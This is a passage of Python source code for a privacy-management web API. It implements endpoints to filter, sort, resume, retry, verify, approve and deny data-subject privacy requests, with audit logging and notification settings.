null().label(\"dataset_name\"),\n null().label(\"collection_name\"),\n null().label(\"connection_key\"),\n null().label(\"fields_affected\"),\n null().label(\"action_type\"),\n AuditLog.user_id,\n ).filter(AuditLog.privacy_request_id == self.id)\n\n combined: Query = execution_log_query.union_all(audit_log_query)\n\n for log in combined.order_by(ExecutionLog.updated_at.asc()):\n dataset_name: str = 
log.dataset_name or f\"Request {log.status}\"\n\n if len(all_logs[dataset_name]) > EMBEDDED_EXECUTION_LOG_LIMIT - 1:\n continue\n all_logs[dataset_name].append(log)\n return all_logs\n\n\ndef _filter_privacy_request_queryset(\n db: Session,\n query: Query,\n request_id: Optional[str] = None,\n identity: Optional[str] = None,\n status: Optional[List[PrivacyRequestStatus]] = None,\n created_lt: Optional[datetime] = None,\n created_gt: Optional[datetime] = None,\n started_lt: Optional[datetime] = None,\n started_gt: Optional[datetime] = None,\n completed_lt: Optional[datetime] = None,\n completed_gt: Optional[datetime] = None,\n errored_lt: Optional[datetime] = None,\n errored_gt: Optional[datetime] = None,\n external_id: Optional[str] = None,\n action_type: Optional[ActionType] = None,\n) -> Query:\n \"\"\"\n Utility method to apply filters to our privacy request query.\n\n Status supports \"or\" filtering:\n ?status=approved&status=pending will be translated into an \"or\" query.\n \"\"\"\n if any([completed_lt, completed_gt]) and any([errored_lt, errored_gt]):\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=\"Cannot specify both succeeded and failed query params.\",\n )\n\n validate_start_and_end_filters(\n [\n (created_lt, created_gt, \"created\"),\n (completed_lt, completed_gt, \"completed\"),\n (errored_lt, errored_gt, \"errored\"),\n (started_lt, started_gt, \"started\"),\n ]\n )\n\n if identity:\n hashed_identity = ProvidedIdentity.hash_value(value=identity)\n identities: Set[str] = {\n identity[0]\n for identity in ProvidedIdentity.filter(\n db=db,\n conditions=(\n (ProvidedIdentity.hashed_value == hashed_identity)\n & (ProvidedIdentity.privacy_request_id.isnot(None))\n ),\n ).values(column(\"privacy_request_id\"))\n }\n query = query.filter(PrivacyRequest.id.in_(identities))\n # Further restrict all PrivacyRequests by query params\n if request_id:\n query = query.filter(PrivacyRequest.id.ilike(f\"{request_id}%\"))\n if external_id:\n query = query.filter(PrivacyRequest.external_id.ilike(f\"{external_id}%\"))\n if status:\n query = query.filter(PrivacyRequest.status.in_(status))\n if created_lt:\n query = query.filter(PrivacyRequest.created_at < created_lt)\n if created_gt:\n query = query.filter(PrivacyRequest.created_at > created_gt)\n if started_lt:\n query = query.filter(PrivacyRequest.started_processing_at < started_lt)\n if started_gt:\n query = query.filter(PrivacyRequest.started_processing_at > started_gt)\n if completed_lt:\n query = query.filter(\n PrivacyRequest.status == PrivacyRequestStatus.complete,\n PrivacyRequest.finished_processing_at < completed_lt,\n )\n if completed_gt:\n query = query.filter(\n PrivacyRequest.status == PrivacyRequestStatus.complete,\n PrivacyRequest.finished_processing_at > completed_gt,\n )\n if errored_lt:\n query = query.filter(\n PrivacyRequest.status == PrivacyRequestStatus.error,\n PrivacyRequest.finished_processing_at < errored_lt,\n )\n if errored_gt:\n query = query.filter(\n PrivacyRequest.status == PrivacyRequestStatus.error,\n PrivacyRequest.finished_processing_at > errored_gt,\n )\n if action_type:\n policy_ids_for_action_type = (\n db.query(Rule)\n .filter(Rule.action_type == action_type)\n .with_entities(Rule.policy_id)\n .distinct()\n )\n query = query.filter(PrivacyRequest.policy_id.in_(policy_ids_for_action_type))\n\n return query\n\n\ndef _sort_privacy_request_queryset(\n query: Query, sort_field: str, sort_direction: ColumnSort\n) -> Query:\n if hasattr(PrivacyRequest, sort_field) is False:\n raise 
HTTPException(\n status_code=HTTP_422_UNPROCESSABLE_ENTITY,\n detail=f\"{sort_field} is not on PrivacyRequest\",\n )\n\n sort_object_attribute = getattr(PrivacyRequest, sort_field)\n sort_func = getattr(sort_object_attribute, sort_direction)\n return query.order_by(nullslast(sort_func()))\n\n\ndef attach_resume_instructions(privacy_request: PrivacyRequest) -> None:\n \"\"\"\n Temporarily update a paused/errored/requires_input privacy request object with instructions from the Redis cache\n about how to resume manually if applicable.\n \"\"\"\n resume_endpoint: Optional[str] = None\n action_required_details: Optional[CheckpointActionRequired] = None\n\n if privacy_request.status == PrivacyRequestStatus.paused:\n action_required_details = privacy_request.get_paused_collection_details()\n\n if action_required_details:\n # Graph is paused on a specific collection\n resume_endpoint = (\n PRIVACY_REQUEST_MANUAL_ERASURE\n if action_required_details.step == CurrentStep.erasure\n else PRIVACY_REQUEST_MANUAL_INPUT\n )\n else:\n # Graph is paused on a pre-processing webhook\n resume_endpoint = PRIVACY_REQUEST_RESUME\n\n elif privacy_request.status == PrivacyRequestStatus.error:\n action_required_details = privacy_request.get_failed_checkpoint_details()\n resume_endpoint = PRIVACY_REQUEST_RETRY\n\n elif privacy_request.status == PrivacyRequestStatus.requires_input:\n # No action required details because this doesn't need to resume from a\n # specific step or collection\n resume_endpoint = PRIVACY_REQUEST_RESUME_FROM_REQUIRES_INPUT\n\n if action_required_details:\n action_required_details.step = action_required_details.step.value # type: ignore\n action_required_details.collection = (\n action_required_details.collection.value if action_required_details.collection else None # type: ignore\n )\n\n privacy_request.action_required_details = action_required_details\n # replaces the placeholder in the url with the privacy request id\n privacy_request.resume_endpoint = (\n resume_endpoint.format(privacy_request_id=privacy_request.id)\n if resume_endpoint\n else None\n )\n\n\n@router.get(\n PRIVACY_REQUESTS,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_READ])],\n response_model=Page[\n Union[\n PrivacyRequestVerboseResponse,\n PrivacyRequestResponse,\n ]\n ],\n)\ndef get_request_status(\n *,\n db: Session = Depends(deps.get_db),\n params: Params = Depends(),\n request_id: Optional[str] = None,\n identity: Optional[str] = None,\n status: Optional[List[PrivacyRequestStatus]] = FastAPIQuery(\n default=None\n ), # type:ignore\n created_lt: Optional[datetime] = None,\n created_gt: Optional[datetime] = None,\n started_lt: Optional[datetime] = None,\n started_gt: Optional[datetime] = None,\n completed_lt: Optional[datetime] = None,\n completed_gt: Optional[datetime] = None,\n errored_lt: Optional[datetime] = None,\n errored_gt: Optional[datetime] = None,\n external_id: Optional[str] = None,\n action_type: Optional[ActionType] = None,\n verbose: Optional[bool] = False,\n include_identities: Optional[bool] = False,\n include_custom_privacy_request_fields: Optional[bool] = False,\n download_csv: Optional[bool] = False,\n sort_field: str = \"created_at\",\n sort_direction: ColumnSort = ColumnSort.DESC,\n) -> Union[StreamingResponse, AbstractPage[PrivacyRequest]]:\n \"\"\"Returns PrivacyRequest information. 
Supports a variety of optional query params.\n\n To fetch a single privacy request, use the request_id query param `?request_id=`.\n To see individual execution logs, use the verbose query param `?verbose=True`.\n \"\"\"\n logger.info(\"Finding all request statuses with pagination params {}\", params)\n\n query = db.query(PrivacyRequest)\n query = _filter_privacy_request_queryset(\n db,\n query,\n request_id,\n identity,\n status,\n created_lt,\n created_gt,\n started_lt,\n started_gt,\n completed_lt,\n completed_gt,\n errored_lt,\n errored_gt,\n external_id,\n action_type,\n )\n\n logger.info(\n \"Sorting requests by field: {} and direction: {}\", sort_field, sort_direction\n )\n query = _sort_privacy_request_queryset(query, sort_field, sort_direction)\n\n if download_csv:\n # Returning here if download_csv param was specified\n logger.info(\"Downloading privacy requests as csv\")\n return privacy_request_csv_download(db, query)\n\n # Conditionally embed execution log details in the response.\n if verbose:\n logger.info(\"Finding execution and audit log details\")\n PrivacyRequest.execution_and_audit_logs_by_dataset = property(\n execution_and_audit_logs_by_dataset_name\n )\n else:\n PrivacyRequest.execution_and_audit_logs_by_dataset = property(lambda self: None)\n\n paginated = paginate(query, params)\n\n for item in paginated.items: # type: ignore\n if include_identities:\n item.identity = item.get_persisted_identity().dict()\n\n if include_custom_privacy_request_fields:\n item.custom_privacy_request_fields = (\n item.get_persisted_custom_privacy_request_fields()\n )\n\n attach_resume_instructions(item)\n\n return paginated\n\n\n@router.get(\n REQUEST_STATUS_LOGS,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_READ])],\n response_model=Page[ExecutionLogDetailResponse],\n)\ndef get_request_status_logs(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n params: Params = Depends(),\n) -> AbstractPage[ExecutionLog]:\n \"\"\"Returns all the execution logs associated with a given privacy request ordered by updated asc.\"\"\"\n\n get_privacy_request_or_error(db, privacy_request_id)\n\n logger.info(\n \"Finding all execution logs for privacy request {} with params '{}'\",\n privacy_request_id,\n params,\n )\n\n return paginate(\n ExecutionLog.query(db=db)\n .filter(ExecutionLog.privacy_request_id == privacy_request_id)\n .order_by(ExecutionLog.updated_at.asc()),\n params,\n )\n\n\n@router.get(\n PRIVACY_REQUEST_NOTIFICATIONS,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestNotificationInfo,\n dependencies=[\n Security(\n verify_oauth_client,\n scopes=[PRIVACY_REQUEST_NOTIFICATIONS_READ],\n )\n ],\n)\ndef get_privacy_request_notification_info(\n *, db: Session = Depends(deps.get_db)\n) -> PrivacyRequestNotificationInfo:\n \"\"\"Retrieve privacy request notification email addresses and number of failures to trigger notifications.\"\"\"\n info = PrivacyRequestNotifications.all(db)\n\n if not info:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=\"No privacy request notification info found\",\n )\n\n return PrivacyRequestNotificationInfo(\n email_addresses=[x for x in info[0].email.split(EMAIL_JOIN_STRING)],\n notify_after_failures=info[0].notify_after_failures,\n )\n\n\n@router.put(\n PRIVACY_REQUEST_NOTIFICATIONS,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestNotificationInfo,\n dependencies=[\n Security(\n verify_oauth_client,\n scopes=[PRIVACY_REQUEST_NOTIFICATIONS_CREATE_OR_UPDATE],\n )\n ],\n)\ndef 
create_or_update_privacy_request_notifications(\n    *, db: Session = Depends(deps.get_db), request_body: PrivacyRequestNotificationInfo\n) -> PrivacyRequestNotificationInfo:\n    \"\"\"Create or update list of email addresses and number of failures for privacy request notifications.\"\"\"\n    # If email_addresses is empty it means notifications were turned off and the email\n    # information should be deleted from the database. In this situation an empty list\n    # of email addresses is returned along with the notify_after_failures sent from the\n    # front end. This allows the front end to control the default notify_after_failures\n    # number.\n    if not request_body.email_addresses:\n        all_notes = PrivacyRequestNotifications.all(db)\n        try:\n            note: PrivacyRequestNotifications = all_notes[0]\n        except IndexError:\n            pass\n        else:\n            note.delete(db=db)\n\n        return PrivacyRequestNotificationInfo(\n            email_addresses=[],\n            notify_after_failures=request_body.notify_after_failures,\n        )\n\n    notification_info = {\n        \"email\": EMAIL_JOIN_STRING.join(request_body.email_addresses),\n        \"notify_after_failures\": request_body.notify_after_failures,\n    }\n    info_check: List[PrivacyRequestNotifications] = PrivacyRequestNotifications.all(\n        db=db\n    )\n    info: PrivacyRequestNotifications\n    try:\n        info = info_check[0]\n    except IndexError:\n        info = PrivacyRequestNotifications.create(\n            db=db,\n            data=notification_info,\n        )\n    else:\n        info.update(\n            db=db,\n            data=notification_info,\n        )\n\n    return PrivacyRequestNotificationInfo(\n        email_addresses=info.email.split(\", \"),\n        notify_after_failures=info.notify_after_failures,\n    )\n\n\n@router.put(\n    REQUEST_PREVIEW,\n    status_code=HTTP_200_OK,\n    response_model=List[DryRunDatasetResponse],\n    dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_READ])],\n)\ndef get_request_preview_queries(\n    *,\n    db: Session = Depends(deps.get_db),\n    dataset_keys: Optional[List[str]] = Body(None),\n) -> List[DryRunDatasetResponse]:\n    \"\"\"Returns dry run queries given a list of dataset ids. If a dataset references another dataset, both dataset\n    keys must be in the request body.\"\"\"\n    dataset_configs: List[DatasetConfig] = []\n    if not dataset_keys:\n        dataset_configs = DatasetConfig.all(db=db)\n        if not dataset_configs:\n            raise HTTPException(\n                status_code=HTTP_404_NOT_FOUND,\n                detail=\"No datasets could be found\",\n            )\n    else:\n        for dataset_key in dataset_keys:\n            dataset_config = DatasetConfig.get_by(\n                db=db, field=\"fides_key\", value=dataset_key\n            )\n            if not dataset_config:\n                raise HTTPException(\n                    status_code=HTTP_404_NOT_FOUND,\n                    detail=f\"No dataset with id '{dataset_key}'\",\n                )\n            dataset_configs.append(dataset_config)\n    try:\n        connection_configs: List[ConnectionConfig] = []\n        for dataset in dataset_configs:\n            connection_config: Optional[ConnectionConfig] = ConnectionConfig.get(\n                db=db, object_id=dataset.connection_config_id\n            )\n            if connection_config:\n                connection_configs.append(connection_config)\n\n        try:\n            dataset_graph: DatasetGraph = DatasetGraph(\n                *[dataset.get_graph() for dataset in dataset_configs]\n            )\n        except ValidationError as exc:\n            raise HTTPException(\n                status_code=HTTP_400_BAD_REQUEST,\n                detail=f\"{exc}. 
Make sure all referenced datasets are included in the request body.\",\n )\n\n identity_seed: Dict[str, str] = {\n k: \"something\" for k in dataset_graph.identity_keys.values()\n }\n traversal: Traversal = Traversal(dataset_graph, identity_seed)\n queries: Dict[CollectionAddress, str] = collect_queries(\n traversal,\n TaskResources(EMPTY_REQUEST, Policy(), connection_configs, db),\n )\n return [\n DryRunDatasetResponse(\n collectionAddress=CollectionAddressResponse(\n dataset=key.dataset, collection=key.collection\n ),\n query=value,\n )\n for key, value in queries.items()\n ]\n except TraversalError as err:\n logger.info(\"Dry run failed: {}\", err)\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=\"Dry run failed\",\n )\n\n\n@router.post(\n PRIVACY_REQUEST_RESUME,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestResponse,\n)\ndef resume_privacy_request(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n webhook: PolicyPreWebhook = Security(\n verify_callback_oauth, scopes=[PRIVACY_REQUEST_CALLBACK_RESUME]\n ),\n webhook_callback: PrivacyRequestResumeFormat,\n) -> PrivacyRequestResponse:\n \"\"\"Resume running a privacy request after it was paused by a Pre-Execution webhook\"\"\"\n privacy_request = get_privacy_request_or_error(db, privacy_request_id)\n # We don't want to persist derived identities because they have not been provided\n # by the end user\n privacy_request.cache_identity(webhook_callback.derived_identity) # type: ignore\n\n if privacy_request.status != PrivacyRequestStatus.paused:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Invalid resume request: privacy request '{privacy_request.id}' status = {privacy_request.status.value}.\", # type: ignore\n )\n\n logger.info(\n \"Resuming privacy request '{}' from webhook '{}'\",\n privacy_request_id,\n webhook.key,\n )\n\n privacy_request.status = PrivacyRequestStatus.in_processing\n privacy_request.save(db=db)\n\n queue_privacy_request(\n privacy_request_id=privacy_request.id,\n from_webhook_id=webhook.id,\n )\n return privacy_request # type: ignore[return-value]\n\n\ndef validate_manual_input(\n manual_rows: List[Row],\n collection: CollectionAddress,\n dataset_graph: DatasetGraph,\n) -> None:\n \"\"\"Validate manually-added data for a collection.\n\n The specified collection must exist and all fields must be previously defined.\n \"\"\"\n for row in manual_rows:\n for field_name in row:\n if not dataset_graph.nodes[collection].contains_field(\n lambda f: f.name == field_name # pylint: disable=W0640\n ):\n raise HTTPException(\n status_code=HTTP_422_UNPROCESSABLE_ENTITY,\n detail=f\"Cannot save manual rows. No '{field_name}' field defined on the '{collection.value}' collection.\",\n )\n\n\ndef resume_privacy_request_with_manual_input(\n privacy_request_id: str,\n db: Session,\n expected_paused_step: CurrentStep,\n manual_rows: List[Row] = [],\n manual_count: Optional[int] = None,\n) -> PrivacyRequest:\n \"\"\"Resume privacy request after validating and caching manual data for an access or an erasure request.\n\n This assumes the privacy request is being resumed from a specific collection in the graph.\n \"\"\"\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n if privacy_request.status != PrivacyRequestStatus.paused:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Invalid resume request: privacy request '{privacy_request.id}' \" # type: ignore\n f\"status = {privacy_request.status.value}. 
Privacy request is not paused.\",\n )\n\n paused_details: Optional[\n CheckpointActionRequired\n ] = privacy_request.get_paused_collection_details()\n if not paused_details:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Cannot resume privacy request '{privacy_request.id}'; no paused details.\",\n )\n\n paused_step: CurrentStep = paused_details.step\n paused_collection: Optional[CollectionAddress] = paused_details.collection\n\n if paused_step != expected_paused_step:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Collection '{paused_collection}' is paused at the {paused_step.value} step. Pass in manual data instead to \"\n f\"'{PRIVACY_REQUEST_MANUAL_ERASURE if paused_step == CurrentStep.erasure else PRIVACY_REQUEST_MANUAL_INPUT}' to resume.\",\n )\n\n datasets = DatasetConfig.all(db=db)\n dataset_graphs = [dataset_config.get_graph() for dataset_config in datasets]\n dataset_graph = DatasetGraph(*dataset_graphs)\n\n if not paused_collection:\n raise HTTPException(\n status_code=HTTP_422_UNPROCESSABLE_ENTITY,\n detail=\"Cannot save manual data on paused collection. No paused collection saved'.\",\n )\n\n node: Optional[Node] = dataset_graph.nodes.get(paused_collection)\n if not node:\n raise HTTPException(\n status_code=HTTP_422_UNPROCESSABLE_ENTITY,\n detail=f\"Cannot save manual data. No collection in graph with name: '{paused_collection.value}'.\",\n )\n\n if paused_step == CurrentStep.access:\n validate_manual_input(manual_rows, paused_collection, dataset_graph)\n logger.info(\n \"Caching manual access input for privacy request '{}', collection: '{}'\",\n privacy_request_id,\n paused_collection,\n )\n privacy_request.cache_manual_access_input(paused_collection, manual_rows)\n\n elif paused_step == CurrentStep.erasure:\n logger.info(\n \"Caching manually erased row count for privacy request '{}', collection: '{}'\",\n privacy_request_id,\n paused_collection,\n )\n privacy_request.cache_manual_erasure_count(paused_collection, manual_count) # type: ignore\n\n logger.info(\n \"Resuming privacy request '{}', {} step, from collection '{}'\",\n privacy_request_id,\n paused_step.value,\n paused_collection.value,\n )\n\n privacy_request.status = PrivacyRequestStatus.in_processing\n privacy_request.save(db=db)\n\n queue_privacy_request(\n privacy_request_id=privacy_request.id,\n from_step=paused_step.value,\n )\n\n return privacy_request\n\n\n@router.post(\n PRIVACY_REQUEST_MANUAL_INPUT,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestResponse,\n dependencies=[\n Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_CALLBACK_RESUME])\n ],\n)\ndef resume_with_manual_input(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n manual_rows: List[Row],\n) -> PrivacyRequestResponse:\n \"\"\"Resume a privacy request by passing in manual input for the paused collection.\n\n If there's no manual data to submit, pass in an empty list to resume the privacy request.\n \"\"\"\n return resume_privacy_request_with_manual_input(\n privacy_request_id=privacy_request_id,\n db=db,\n expected_paused_step=CurrentStep.access,\n manual_rows=manual_rows,\n ) # type: ignore[return-value]\n\n\n@router.post(\n PRIVACY_REQUEST_MANUAL_ERASURE,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestResponse,\n dependencies=[\n Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_CALLBACK_RESUME])\n ],\n)\ndef resume_with_erasure_confirmation(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n cache: FidesopsRedis = 
Depends(deps.get_cache),\n manual_count: RowCountRequest,\n) -> PrivacyRequestResponse:\n \"\"\"Resume the erasure portion of privacy request by passing in the number of rows that were manually masked.\n\n If no rows were masked, pass in a 0 to resume the privacy request.\n \"\"\"\n return resume_privacy_request_with_manual_input(\n privacy_request_id=privacy_request_id,\n db=db,\n expected_paused_step=CurrentStep.erasure,\n manual_count=manual_count.row_count,\n ) # type: ignore[return-value]\n\n\n@router.post(\n PRIVACY_REQUEST_BULK_RETRY,\n status_code=HTTP_200_OK,\n response_model=BulkPostPrivacyRequests,\n dependencies=[\n Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_CALLBACK_RESUME])\n ],\n)\ndef bulk_restart_privacy_request_from_failure(\n privacy_request_ids: List[str],\n *,\n db: Session = Depends(deps.get_db),\n) -> BulkPostPrivacyRequests:\n \"\"\"Bulk restart a of privacy request from failure.\"\"\"\n succeeded: List[PrivacyRequestResponse] = []\n failed: List[Dict[str, Any]] = []\n for privacy_request_id in privacy_request_ids:\n privacy_request = PrivacyRequest.get(db, object_id=privacy_request_id)\n\n if not privacy_request:\n failed.append(\n {\n \"message\": f\"No privacy request found with id '{privacy_request_id}'\",\n \"data\": {\"privacy_request_id\": privacy_request_id},\n }\n )\n continue\n\n if privacy_request.status != PrivacyRequestStatus.error:\n failed.append(\n {\n \"message\": f\"Cannot restart privacy request from failure: privacy request '{privacy_request.id}' status = {privacy_request.status.value}.\",\n \"data\": {\"privacy_request_id\": privacy_request_id},\n }\n )\n continue\n\n failed_details: Optional[\n CheckpointActionRequired\n ] = privacy_request.get_failed_checkpoint_details()\n\n succeeded.append(\n _process_privacy_request_restart(\n privacy_request,\n failed_details.step if failed_details else None,\n failed_details.collection if failed_details else None,\n db,\n )\n )\n\n return BulkPostPrivacyRequests(succeeded=succeeded, failed=failed)\n\n\n@router.post(\n PRIVACY_REQUEST_RETRY,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestResponse,\n dependencies=[\n Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_CALLBACK_RESUME])\n ],\n)\ndef restart_privacy_request_from_failure(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n) -> PrivacyRequestResponse:\n \"\"\"Restart a privacy request from failure\"\"\"\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n\n if privacy_request.status != PrivacyRequestStatus.error:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Cannot restart privacy request from failure: privacy request '{privacy_request.id}' status = {privacy_request.status.value}.\", # type: ignore\n )\n\n failed_details: Optional[\n CheckpointActionRequired\n ] = privacy_request.get_failed_checkpoint_details()\n\n return _process_privacy_request_restart(\n privacy_request,\n failed_details.step if failed_details else None,\n failed_details.collection if failed_details else None,\n db,\n )\n\n\ndef review_privacy_request(\n db: Session,\n request_ids: List[str],\n process_request_function: Callable,\n) -> BulkReviewResponse:\n \"\"\"Helper method shared between the approve and deny privacy request endpoints\"\"\"\n succeeded: List[PrivacyRequest] = []\n failed: List[Dict[str, Any]] = []\n\n for request_id in request_ids:\n privacy_request = PrivacyRequest.get(db, object_id=request_id)\n if not privacy_request:\n failed.append(\n {\n 
\"message\": f\"No privacy request found with id '{request_id}'\",\n \"data\": {\"privacy_request_id\": request_id},\n }\n )\n continue\n\n if privacy_request.status != PrivacyRequestStatus.pending:\n failed.append(\n {\n \"message\": \"Cannot transition status\",\n \"data\": PrivacyRequestResponse.from_orm(privacy_request),\n }\n )\n continue\n\n try:\n process_request_function(privacy_request)\n except Exception:\n failure = {\n \"message\": \"Privacy request could not be updated\",\n \"data\": PrivacyRequestResponse.from_orm(privacy_request),\n }\n failed.append(failure)\n else:\n succeeded.append(privacy_request)\n\n return BulkReviewResponse(\n succeeded=succeeded,\n failed=failed,\n )\n\n\ndef _send_privacy_request_review_message_to_user(\n action_type: MessagingActionType,\n identity_data: Dict[str, Any],\n rejection_reason: Optional[str],\n service_type: Optional[str],\n) -> None:\n \"\"\"Helper method to send review notification message to user, shared between approve and deny\"\"\"\n if not identity_data:\n logger.error(\n IdentityNotFoundException(\n \"Identity was not found, so request review message could not be sent.\"\n )\n )\n to_identity: Identity = Identity(\n email=identity_data.get(ProvidedIdentityType.email.value),\n phone_number=identity_data.get(ProvidedIdentityType.phone_number.value),\n )\n dispatch_message_task.apply_async(\n queue=MESSAGING_QUEUE_NAME,\n kwargs={\n \"message_meta\": FidesopsMessage(\n action_type=action_type,\n body_params=RequestReviewDenyBodyParams(\n rejection_reason=rejection_reason\n )\n if action_type is MessagingActionType.PRIVACY_REQUEST_REVIEW_DENY\n else None,\n ).dict(),\n \"service_type\": service_type,\n \"to_identity\": to_identity.dict(),\n },\n )\n\n\n@router.post(\n PRIVACY_REQUEST_VERIFY_IDENTITY,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestResponse,\n)\ndef verify_identification_code(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n config_proxy: ConfigProxy = Depends(deps.get_config_proxy),\n provided_code: VerificationCode,\n) -> PrivacyRequestResponse:\n \"\"\"Verify the supplied identity verification code.\n\n If successful, and we don't need separate manual request approval, queue the privacy request\n for execution.\n \"\"\"\n\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n try:\n privacy_request.verify_identity(db, provided_code.code)\n policy: Optional[Policy] = Policy.get(\n db=db, object_id=privacy_request.policy_id\n )\n if config_proxy.notifications.send_request_receipt_notification:\n _send_privacy_request_receipt_message_to_user(\n policy,\n privacy_request.get_persisted_identity(),\n config_proxy.notifications.notification_service_type,\n )\n except IdentityVerificationException as exc:\n raise HTTPException(status_code=HTTP_400_BAD_REQUEST, detail=exc.message)\n except PermissionError as exc:\n logger.info(\"Invalid verification code provided for {}.\", privacy_request.id)\n raise HTTPException(status_code=HTTP_403_FORBIDDEN, detail=exc.args[0])\n\n logger.info(\"Identity verified for {}.\", privacy_request.id)\n\n if not config_proxy.execution.require_manual_request_approval:\n AuditLog.create(\n db=db,\n data={\n \"user_id\": \"system\",\n \"privacy_request_id\": privacy_request.id,\n \"action\": AuditLogAction.approved,\n \"message\": \"\",\n },\n )\n queue_privacy_request(privacy_request.id)\n\n return privacy_request # type: ignore[return-value]\n\n\n@router.patch(\n PRIVACY_REQUEST_APPROVE,\n status_code=HTTP_200_OK,\n 
response_model=BulkReviewResponse,\n)\ndef approve_privacy_request(\n *,\n db: Session = Depends(deps.get_db),\n config_proxy: ConfigProxy = Depends(deps.get_config_proxy),\n client: ClientDetail = Security(\n verify_oauth_client,\n scopes=[PRIVACY_REQUEST_REVIEW],\n ),\n privacy_requests: ReviewPrivacyRequestIds,\n) -> BulkReviewResponse:\n \"\"\"Approve and dispatch a list of privacy requests and/or report failure\"\"\"\n user_id = client.user_id\n\n def _approve_request(privacy_request: PrivacyRequest) -> None:\n \"\"\"Method for how to process requests - approved\"\"\"\n now = datetime.utcnow()\n privacy_request.status = PrivacyRequestStatus.approved\n privacy_request.reviewed_at = now\n privacy_request.reviewed_by = user_id\n # for now, the reviewer will be marked as the approver of the custom privacy request fields\n # this is to make it flexible in the future if we want to allow a different user to approve\n if privacy_request.custom_fields: # type: ignore[attr-defined]\n privacy_request.custom_privacy_request_fields_approved_at = now\n privacy_request.custom_privacy_request_fields_approved_by = user_id\n privacy_request.save(db=db)\n AuditLog.create(\n db=db,\n data={\n \"user_id\": user_id,\n \"privacy_request_id\": privacy_request.id,\n \"action\": AuditLogAction.approved,\n \"message\": \"\",\n },\n )\n if config_proxy.notifications.send_request_review_notification:\n _send_privacy_request_review_message_to_user(\n action_type=MessagingActionType.PRIVACY_REQUEST_REVIEW_APPROVE,\n identity_data=privacy_request.get_cached_identity_data(),\n rejection_reason=None,\n service_type=config_proxy.notifications.notification_service_type,\n )\n\n queue_privacy_request(privacy_request_id=privacy_request.id)\n\n return review_privacy_request(\n db=db,\n request_ids=privacy_requests.request_ids,\n process_request_function=_approve_request,\n )\n\n\n@router.patch(\n PRIVACY_REQUEST_DENY,\n status_code=HTTP_200_OK,\n response_model=BulkReviewResponse,\n)\ndef deny_privacy_request(\n *,\n db: Session = Depends(deps.get_db),\n config_proxy: ConfigProxy = Depends(deps.get_config_proxy),\n client: ClientDetail = Security(\n verify_oauth_client,\n scopes=[PRIVACY_REQUEST_REVIEW],\n ),\n privacy_requests: DenyPrivacyRequests,\n) -> BulkReviewResponse:\n \"\"\"Deny a list of privacy requests and/or report failure\"\"\"\n user_id = client.user_id\n\n def _deny_request(\n privacy_request: PrivacyRequest,\n ) -> None:\n \"\"\"Method for how to process requests - denied\"\"\"\n privacy_request.status = PrivacyRequestStatus.denied\n privacy_request.reviewed_at = datetime.utcnow()\n privacy_request.reviewed_by = user_id\n privacy_request.save(db=db)\n AuditLog.create(\n db=db,\n data={\n \"user_id\": user_id,\n \"privacy_request_id\": privacy_request.id,\n \"action\": AuditLogAction.denied,\n \"message\": privacy_requests.reason,\n },\n )\n if config_proxy.notifications.send_request_review_notification:\n _send_privacy_request_review_message_to_user(\n action_type=MessagingActionType.PRIVACY_REQUEST_REVIEW_DENY,\n identity_data=privacy_request.get_cached_identity_data(),\n rejection_reason=privacy_requests.reason,\n service_type=config_proxy.notifications.notification_service_type,\n )\n\n return review_privacy_request(\n db=db,\n request_ids=privacy_requests.request_ids,\n process_request_function=_deny_request,\n )\n\n\ndef _handle_manual_webhook_input(\n action: Literal[\"access\", \"erasure\"],\n connection_config: ConnectionConfig,\n privacy_request_id: str,\n db: Session,\n input_data: Dict[str, 
Any],\n) -> None:\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n access_manual_webhook: AccessManualWebhook = get_access_manual_webhook_or_404(\n connection_config\n )\n\n if not privacy_request.status == PrivacyRequestStatus.requires_input:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Invalid manual webhook {action} upload request: privacy request '{privacy_request.id}' status = {privacy_request.status.value}.\", # type: ignore\n )\n\n try:\n getattr(privacy_request, f\"cache_manual_webhook_{action}_input\")(\n access_manual_webhook, input_data\n )\n except PydanticValidationError as exc:\n raise HTTPException(\n status_code=HTTP_422_UNPROCESSABLE_ENTITY, detail=exc.errors()\n )\n\n logger.info(\n \"{} input saved for manual webhook '{}' for privacy_request '{}'.\",\n action.capitalize(),\n access_manual_webhook,\n privacy_request,\n )\n\n\n@router.patch(\n PRIVACY_REQUEST_MANUAL_WEBHOOK_ACCESS_INPUT,\n status_code=HTTP_200_OK,\n dependencies=[Security(verify_oauth_client, 